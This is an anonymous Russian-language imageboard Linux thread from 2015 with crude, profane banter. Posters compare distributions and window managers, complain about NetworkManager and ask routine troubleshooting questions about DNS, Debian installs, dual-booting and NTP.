>>1500919 iptables v1.4.21: can't initialize iptables table `mangle': Permission denied (you must be root) Perhaps iptables or your kernel needs to be upgraded.
Убунтоидный минт лучше для нубов в качестве первой коляски, и лучше для обычных юзеров с лэптопами из-за большей доступности несвободных драйверов. Also там XFCE не поломан в угоду пересадке на Юнити, как в Убунте.
Убунта же лучше убунтоидного минта для тех, кому нужен более свежий и чаще обновляющийся софт в репах, и для фанатов Юнити. Есть люди, которые действительно находят это DE наиюолее удобным.
А вот дебьяновая редакция минта лучше для продолжающих или изначально более продвинутых юзеров. Там все достоинства вышеперечисленных, плюс debian rolling под капотом. Но есть "шероховатости", которые правятся руками в дебьян-вэе.
>>1500940 Нет. Открой второе окно и случится пиздец. Можно конечно напердолить 100500 рабочих столов и ещё больше правил, но это то ещё говноедство. Можно конечно и в тайлопараше врубить просто фулскрин везде, но какой смысл(если так любой даже нетайловый вм может)? >Ко-ко-ко минимализм Повзрослей
>>1500946 У него в зависимостях более новые проприетарные драйвера, это хром он и от виндовса самых новых хочет. Ему только на десятке норм теперь, для семерки он выключает половину фич, для XP все выключает. Без Dx11 там говно еще а не шрифты, так как в гугле решили что это лучший способ их рендеринга.
>>1500950 >NetworkManager Я тебя категорически умоляю. Этот подглюкивающий, абстрагирующий от реального положения дел с сетью апплет, периодически просто мешает работать. К тому же он валит все соединнения, если иксы вдруг уходят в даун.
>>1500965 Я вкатился лень скроллить весь тред. Что там у тебя?
Аноним (Microsoft Windows 7: Firefox based)08/12/15 Втр 14:16:51#371№1500971
>>1500968 >инжектор в машине хуева вот мозги наебнуться у тебя и не поедет ничего, вот с карбюрахтором вот хорошо все, ничего ему больше не надо подсосал и поехал
Аноним (Microsoft Windows Phone: Internet Explorer)08/12/15 Втр 14:19:07#376№1500977
>>1500953 И у меня вроде всего 3 года, но как же оптимизация ресурсопотребления?
Аноним (Microsoft Windows 7: Firefox based)08/12/15 Втр 14:20:40#377№1500978
>>1500972 Что-то знакомое. Когда у меня роутера не было, купи роутер, заебал, у меня вон два валяется, бери один и я ебался с провайдерским pppoe тоже что-то подобное было. DNS настроен? Это все было больше пяти лет назад и я даже не помню, как там все. Вроде как скрипт pppoeconf в /etc/resolve.conf кидает полученные от провайдера dns. Попробуй туда 8.8.8.8 и 8.8.4.4 прописать
Аноним (Microsoft Windows 7: Chromium based)08/12/15 Втр 14:21:49#378№1500979
>>1500973 Не надо ниче растаскивать. Alt-Tab и все или еще в Гноме Win нажать и тыцнуть нужное окно
Аноним (Microsoft Windows 7: Firefox based)08/12/15 Втр 14:22:12#379№1500980
>>1500978 И от записи защити его чтоб всякая мразь туда не лезла, конечно же.
А тем временемАноним (Microsoft Windows 7: Internet Explorer)08/12/15 Втр 14:22:27#380№1500982
ПРИШЛО ВРЕМЯ ПЕРЕКОНПЕЛИРОВАТЬ ВЕДРО ВЕДРО САМО НЕ ПЕРЕКОНПЕЛИРУЕТСЯ ПЕРЕКОНПЕЛИРУЙ ЕГО, ПЕРЕКОНПЕЛИРУЙ ЕГО ЕЩЕ РАЗ ЗАЧЕМ МНЕ НУЖЕН ШINDOWS, Я СЛИШКОМ ГОРД ЧТОБЫ СТАВИТЬ ЕГО ЛУЧШЕ ЕЩЕ РАЗ ПЕРЕКОНПЕЛИРОВАТЬ ВЕДРО Я ПЕРЕКОНПЕЛИРУЮ ВЕДРО ПО 7 РАЗ В НЕДЕЛЮ КАЖДАЯ КОНПЕЛЯЦИЯ ЗАНИМАЕТ ДВАДЦАДЬ ЧАСОВ Я ЖИВУ АКТИВНОЙ И ПОЛНОЦЕННОЙ ЖИЗНЬЮ Я УСПЕШЕН И ПОЭТОМУ ЦЕЛЫЙ ДЕНЬ ЕБУСЬ С КОНСОЛЬЮ А ПОСЛЕ ЭТОГО ПЕРЕКОНПЕЛИРУЮ ВЕДРО ТУПЫЕ СПЕРМОБЛЯДИ ОДЕРЖИМЫ АНАЛЬНОЙ ПРОПРИЕТАРЩИНОЙ А Я СВОБОДНЫЙ ОТ БЫДЛОПРОБЛЕМ ЧЕЛОВЕК СКОЧАТЬ БЕСПЛАТНО С РЕПОЗИТОРИЯ ЕБИЛДЫ ИМЕРДЖ ГЕНТУ-СУРСЕС МЭЙК && МЭЙК МОДУЛС_ИНСТОЛЛ ЛУЧШЕ Я ПЕРЕКОНПЕЛИРУЮ ВЕДРО ЕЩЕ РАЗ И ПОСТАВЛЮ ДРАЙВЕРА НА ПРОЦЕССОР С ЛОРА, СТАБИЛЬНОСТЬ НУЖНА Я НЕ КОНПЕЛИРОВАЛ ВЕДРО НЕДЕЛЮ ПОЙДУ ПЕРЕКОНПЕЛИРУЮ В ПИТУХ ОС ВСЕ ПРОСТО И ПОНЯТНО АААА ОШИБКА 12309. ЭТО ЖЕ ОЧЕВИДНО КАК ЕЕ РЕШИТЬ ПРИШЛО ВРЕМЯ ПЕРЕКОНПЕЛИРОВАТЬ ВЕДРО ККОКОКОКОКОКОКО ЖМУ EMERGE WORLD СПЕРМОРАБЫ ШВАБОДКА ШТОЛМАН КОКОКОКОКОКОКО
Аноним (Microsoft Windows Phone: Internet Explorer)08/12/15 Втр 14:22:55#381№1500983
>>1500979 Что делает альт-таб? Ты листаешь окна по-одному? Фу
Аноним (Microsoft Windows 7: Firefox based)08/12/15 Втр 14:23:30#382№1500984
>>1500982 Пользуюсь линуксами больше пяти лет и ни разу не конпелировал ядро. Пойду сконпелирую.
Аноним (Microsoft Windows Phone: Internet Explorer)08/12/15 Втр 14:24:34#383№1500986
>>1500984 Доброго пожаловать. Отключи сразу всякие делали заодно
>>1500973 >Нетайлинг это окошки, перекрывающие друг друга, которые надо растаскивать мышкой. Это от настроек зависит. Ты описал плавающий режим. Ещё есть каскады всякие и т.д. А вообще что за мания растаскивать окна? У меня например просто все окна полноэкранные. Но специально для тебя демотивирующий пик (У меня обычный нетайловый вм и я ничего не растаскивал. Просто отключил фуллскрин и включил прилипание+умное размещение). А ты продолжай говно жрать.
Аноним (Microsoft Windows 7: Internet Explorer)08/12/15 Втр 14:26:04#385№1500990
>>1500984 Заодно не забудь попердолиться консолькой в срачельничекбгггг
Аноним (Microsoft Windows 7: Chromium based)08/12/15 Втр 14:27:20#387№1500992
>>1500983 Ну обычно я одновременно взаимодействую с тремя-четырьмя окнами, так что я не понимаю проблемы тупо листать их. Плюс-минус нажатие Таба погоды не делает.
Расскажи, как "не фу"
Аноним (Microsoft Windows 7: Firefox based)08/12/15 Втр 14:27:26#388№1500993
>>1500990 Вот с консолечкой пердолился, да, много пердолился. по-моему и ядро конпелировал. Только с AUR взятое, так что не считается
>>1500971 >инжектор Если следовать твоей аналогии, то нескушное приложение для смартфона. "Оставь лайк и мы заведем твою машину по GSM". Ну ты понел.
>>1500975 Это уже пиздец, на сам деле. Но меня больше выбешивает его манера работы с проводными соединениями. Когда профили, souqa, начинают самопроизвольно переключаться и даже создаваться. Я уж не говорю, что при переазгрузке иксов машина остаётся без сети. Что мешало сделать нормальный линукс вэй: независимый от DE демон + управляющий апплет-клиент. Хотя, чему я удивляюсь, belat'. Отдельные кодеры, пишущие нескучные дектопные прибамбасы, бывает даже и не догадываются, что икс-сервер может крутиться вообще на другом компьютере, ЛОЛ.
Аноним (Microsoft Windows Phone: Internet Explorer)08/12/15 Втр 14:28:48#390№1500995
Аноним (Microsoft Windows 10: Firefox based)08/12/15 Втр 14:31:01#393№1500999
Есть что-то для резервного копирования? Под виндой прикипел к cobianовской поделке. Нужно копирование по рассписанию информации с внешнего диска на файлопомойку и другой диск. Желательно с гуем, хотя не критично.
Аноним (Microsoft Windows 7: Firefox based)08/12/15 Втр 14:31:18#394№1501000
>>1500991 >DO NOT EDIT THIS FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN >>1500980 >И от записи защити его чтоб всякая мразь туда не лезла, конечно же.
Хотя может и вправду в MTU дело. На OpenWRT помню тоже с ним ебался. Сейчас то поставил хрен знает сколько лет назад и не единого разрыва. В общем читай внимательнее статью и пробуй.
Аноним (Microsoft Windows 7: Chromium based)08/12/15 Втр 14:31:21#395№1501001
>>1500997 ну несколько рабочих столов ведь тоже умеет любой Гном
Аноним (Microsoft Windows Phone: Internet Explorer)08/12/15 Втр 14:31:26#396№1501002
Нужен каталогизатор картинок с возможностью прикрепить к картинке пользовательский тег или несколько тегов, плюс собственно список созданных тегов для быстрого поиска.
Аноним (Microsoft Windows 10: Chromium based)08/12/15 Втр 14:38:50#412№1501021
>>1500954 Спасибо, пойду себе дебиан-минт накачу на виртуалку что ли
>>1501006 Какого хера он тогда ethernet соединения рветь при завершении пользовательской сессии иксов и из списка процессов пропадает?
Аноним (Microsoft Windows 7: Firefox based)08/12/15 Втр 14:42:13#424№1501035
>>1501028 Нет, некоторые собирают машины с 16ГБ оперативной памяти а потом усираются в браузеротреде что браузер сожрал целые 500мб на 200 вкладок. Ебанутые
>>1501029 Это достаточно удобно на мониторах 16:9/16:10 на самом деле. Может всё то же, что и обычные вм, но ещё и тайлинг, и табы всякие, раскидывания по рабочим столам по правилам. Супер-няшно. >>1501036 xfce это.
Аноним (Microsoft Windows Phone: Internet Explorer)08/12/15 Втр 14:44:46#430№1501044
>>1501013 А дальше? На мышку руку переносить и елозить? Удобно, че.
>>1501042 >Может всё то же, что и обычные вм Манямирок. Это обычные вм уже довно умеют абсолютно всё(и даже тайлинг). >Это достаточно удобно на мониторах 16:9/16:10 на самом деле. Ничуть не удобнее умного размещения. Но васянам-тайлописателям сложно такую функцию реализовать, только в разбивание, флоатинг и фуллскрин могут
>>1501052 Ну бля, у тебя же есть какие-нибудь увлечения, заёбы. Исходя из них и выбирай. Я однажды 20+ машин именовал на основе генератора эльфийских имён, лол. А у знакомого админа все сервера названы в честь тоталитарных правителей.
>>1501051 2015 год, плюс она пугает она обычно всегда при установке системы и там часто случался отказ, весь в волнениях после установщиков старых виндовсов когда вижу лол.
Аноним (Microsoft Windows 7: Firefox based)08/12/15 Втр 14:50:25#443№1501059
Какой офис может в сравнение текста на двух страницах, по абзацам? Очень нужно
>>1501057 Какие ещё отказы? Это не от интерфейса зависит. Да и ничего страшного в псевдографике, в 2015 она вполне уместна. Гуи такие страшные, нелогичные и глючные бывают, что мне ближе псевдографика, которая обычно выглядит почти одинаково.
>>1501055 В обычных вм тайлинг очень слабый. Что за УМНОЕ РАЗМЕЩЕНИЕ? У многих тайловых вм есть пресеты, работающие на лету + можно менять пресеты и схему расположения. Плюс разные виды табов. Ты посиди на i3 том же неделю хотя бы.
Аноним (Microsoft Windows 7: Firefox based)08/12/15 Втр 14:55:08#450№1501068
>>1501063 Компилируешь весь мир, мутишь вебмки и работаешь в блендере сразу? Куда ты, блять, можешь деть 16 гигов
Аноним (Microsoft Windows 7: Firefox based)08/12/15 Втр 14:55:43#451№1501069
>>1501065 А, нахуя нам то что-то доказывать тебе, ты тут выебываешься своей хуитой юзлесс
Аноним (Microsoft Windows 7: Firefox based)08/12/15 Втр 14:56:15#452№1501070
>>1501067 >Ты посиди на i3 том же неделю хотя бы. Сидел год на dwm. Пробовал wmii, осом, Xmonad, i3, bspwm, ratpoison. Ратпоисон самый нормальный у него хоть концепция есть какая никакая, а остальное вообще пиздец. Впоминаю васянобыдлокод как страшный сон
>>1501060 В рогаликах уместна, и в серверных/специализированных инсталляторах. Графический интерфейс установки своего шрифта МС мог бы и поменять, кому нужен еще этот пакет(заменен фиктивным в более новых системах)
>>1501086 Пошли они на хуй со своим графическим инсталятором. Псевдографика не требует ничего и не специфична в плане тулкитов, ДЕ/ВМ, дистрибутивов. Это универсальная вещь.
Аноним (Microsoft Windows 7: Firefox based)08/12/15 Втр 16:08:23#467№1501122
>>1501151 Третьяковка просто, картины в мак-оси висят, кубизм там/ триугольнизм/прочие направления современного исскуства, иконочки цветные и гейфлаг по дефолту есть: а пользоваться то как?
>>1501155 Оставил на месте, а что за зонд то? Амазон просто не запускал, поиск через юнити мне не нужен и был сразу отключен.
По делу бы обьяснил как этой третьяковкой пользоваться можно, ну посмотреть на нее можно, окна потаскать, эффекты поглядеть. Но пользоваться на постоянно основе: нет, мне ненужно меню пукс, мне не нужны окошечки становяшиеся прозрачными и прозрачнось которую как не настраивай не станет такой какой ты хочешь, мне не нужны голубые тени вокруг всех окон KDE-4 и много еще чего.
Для запуска браузера и 6-7 программ лучше что полегче использовать, или не особо полегче вроде юнити но совершенно не требующее настройки до внятного внешнего вида.
>>1501170 Да тебе вообще ничего не нужно кроме толстенного некастомизируемого говнодока. Ну а если ты считаешь, что в KDE главное - эффекты с украшениями, то ты просто дурачок малолетний.
>>1501179 Что тогда там главное? Когда там 95% это дрочба на внешний вид и перделки со свистелками в худшем виде. Это вообще необосновано никак, то что они сделали в пятой версии от класических привычных интерфейсов там только пуск остался да набор курсоров.
Альтернативные решения для внутренностей системы, и программы в едином стиле начинающиеся на K - да знаю, но неужели ради программ? Ну что еще управление очень годно сделано просто топово, как мышью так и клавиатурой, ничто не тормозит.
Однако все претензии к интерфейсу, потратил целый час но не смог его особо упростить или привести иначе к годному виду, он выглядить настолько мажорно что блевать хочется и это главная претензия вообще.
>>1501187 >Что тогда там главное? Фичи, настраиваемость и общая продуманность - видно, что для людей делали, а не для галочки или идеологии (HIG-а). Мне лично вообще не важно, как там оно выглядит (хоть как CDE), лишь бы не было отвратительной Govno3-like идеологии прибивания гвоздями и выпиливания всего, что по мнению разработчиков не нужно 95% быдла.
>там 95% это дрочба на внешний вид и перделки со свистелками в худшем виде Ты скозал?
>он выглядить настолько мажорно что блевать хочется Субъективщина какая-то, посыпанная манятерминами. Особенно забавно слышать от копротивленца украшательствам, что его главная претензия - к внешнему виду. Ну а то, что ты не осилил привести к устраивающему тебя виду, говорит только о тебе. Загугли скриншоты людей, посмотри галерю на том же LOR - может найдешь чего.
>>1501193 Выпиливать то что они туда запиливали невероятное количество лет? Легче взять другое чтото, что сразу будет ближе к результату.
Юнити тоже вызывает раздражение в ней есть излишества и некоторая доля ненастраиваемости, но при этом оно лучше работает чем то где излишеств нет. Не было бы тиринга в крысе на встройках, я бы уже был бы там. И главное сообщают что тиринг уже починен типо и баг закрыт, но он есть и никуда не делся.
Аноним (Microsoft Windows Phone: Internet Explorer)08/12/15 Втр 17:48:32#491№1501206
>>1501090 Там до 8гб. Но про кеши спасибо, не знал
Анон, одно из яицядер сейчас зависло но 100%, на запускаемые и убиваемые процессы не реагирует. Кулер не включает. Иногда система виснет намертво, выход только с хардрезетом. Через SysRq не пробовал. Что за нах?
Аноним (Microsoft Windows 7: Chromium based)08/12/15 Втр 18:11:03#500№1501231
>>1500223 (OP) Здоров, пытался накатить на ноут(Acer Aspire) дебиан 8.2.0 netinst, во время установки требует вставить носитель с дровами для сетевого адаптера, а потом зависает на Select and Install software. Nomodeset уже пробовал. Может я не так его использую? Я просто писал его в конце строчки. Короче, ЧЯДНТ и как это починить?
Аноним (Microsoft Windows 10: Chromium based)08/12/15 Втр 18:12:33#501№1501232
Кстати насчет юифая-хуюифая, если уже есть убунта установленная в uefi, в каком режиме ставить шинду чтобы убунта видела ее разделы, дефолтный загрузчик был убунтовский, но видел винду, а виндовый видел убунту.
>>1501231 Бля, у меня всё было точно так же. Тоже с этим поебался. В упор не видит никаких носителей, вернее не ищет на них.
Аноним (Microsoft Windows Phone: Internet Explorer)08/12/15 Втр 18:15:57#503№1501236
>>1501230 Как тогда подсчитать физически используемую за минусом тмпфс?
Аноним (Microsoft Windows 7: Chromium based)08/12/15 Втр 18:16:24#504№1501237
>>1501231 Дело в том, что на этом ноуте только один(рабочий) усб разъём, а оптический привод отсутствует(ноут хуле). Так что я в принципе не могу вставить носитель с дровами(если только достану флешку с ос которая устанавливается).
>>1501239 Может в инет сильно хочет? У тебя инет кабелем-то подключен? У меня довольно долго что-то там тянуло на малой скорости. А может какой-нибудь репозиторий не отвечает.
>>1501241 Переключение требует времени, постоянные переключения достают сильно и не нужны. Пользоваться надо чем-то одним, и надрачивать на аптайм при этом. Дуалбут: это как на зоне в загадке про два стула сказать что сядешь на оба из них.
Аноним (Microsoft Windows 7: Firefox based)08/12/15 Втр 18:40:06#520№1501268
>>1501264 >надрачивать на аптайм Зачем? На арче какое-то время не обновлял ядро, аптайм около 20 дней был на ноуте. Что же в этом такого важного? >Пользоваться надо чем-то одним Опять таки, зачем? На обоих "стульях" есть киллер-фичи.
>>1501268 Чтобы смотреть стабильно это или нет. Альтерантивные киллер-фичи игнорируются по причине лени и ненужности переключаться. Компьютеры не выключаются чтобы не тратить время на включение, но компоненты подобранны так что даже в стресс-нагрузке потреблять менее 100 ватт.
Аноним (Microsoft Windows 7: Firefox based)08/12/15 Втр 18:49:14#523№1501280
>>1501274 >тратить время на включение Systemd грузится даже на моем некроноуте меньше 20с. О второе предложение я мозг сломал и ничего не понял. Наверное, тут дискуссия оборвется.
Анон, как заставить локальные машины плавно синхронизировать время одним с головным сервером, если нет выхода в инет? ntpdate резко перещелкивает системное время, что не очень приемлимо. а запускать её по нескольку раз в минуту, как-то не смешно. А по стандартному ntp-протоколу клиенты с моим сервером сихронизироваться отказываются напрочь. Если дать инет - предпочитиают инетовские сервера, не смотря на параметр prefer. Если инет отнять, то предпочитают собственные локальные часы. Если в конфиге запретить фолбэк на локальные часы, то вообще ни с чем время не синхронизируют. При это головной сервер в списке известных демону висит. Говорят, что это какая-то аппаратная хуйня, мол системные часы идут то ли слишком медленно, то ли слишком нестабильно. Но как бороть - непонятно.
Опиши, после чего появилась проблема и как пытался её решить.
Не копируй бездумно команды, если не понимаешь, что они делают, лучше спроси.
F.A.Q: http://for2ch.github.io/Linux-F.A.Q/
Wiki: https://github.com/for2ch/Linux-F.A.Q/wiki/
Список рекомендуемых дистрибутивов: https://www.gnu.org/distros/free-distros
Прежде чем задать вопрос, посмотри, нет ли его в ЧаВо или Вики.
Предыдущий: